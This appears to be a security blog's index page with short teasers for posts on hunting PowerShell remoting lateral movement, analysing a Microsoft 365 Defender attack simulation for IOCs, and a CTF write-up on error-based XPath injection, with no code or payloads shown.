RFC1918 Blog

Home

Threathunting: PowerShell remoting for lateral movement

What is PowerShell remoting.

“Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers. To use Windows PowerShell remoting, the remote computer must be configured for remote management. For more information, including instructions, see About Remote Requirements. Once you have configured Windows PowerShell remoting, many remoting strategies are available to you. This article lists just a few of them. For more information, see About Remote.”

Attacker’s Goals:

Windows Remote Management (WinRM) enables users to interact with remote systems, including running executable on remote endpoints. Attackers can use WinRM to execute code and move laterally within a compromised network.

Microsoft 365 Defender attack simulations: Fileless Powershell attack with process injection and SMB Recon

Summary:

Today I will be doing a deep dive into the new Microsoft 365 Defender attack simulations. I will be looking into the Fileless Powershell attack with process injection and SMB Recon command script, analyzing the Powershell command script to determine what it will do as well as extracting IOC’s (Indicators of Compromise) along the way. This analysis will be done without referencing the Microsoft documentations to demonstrate the investigation process related to a suspicious Powershell command script. Analyzing how it behaves and extracting the necessary IOC’s from it to actively block and detect related threats.

E.Tree Write-up: Cyber Apocalypse 2021

With Cyber Apocalypse 2021 coming to a end, I wanted to share some of the write-ups for the more interesting challenges we have completed.

Summary:

E.Tree was a Python Flask application that used XPATH to parse XML files. We were presented with an example XML file from where we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to do an error-based XPATH injection to determine the flag.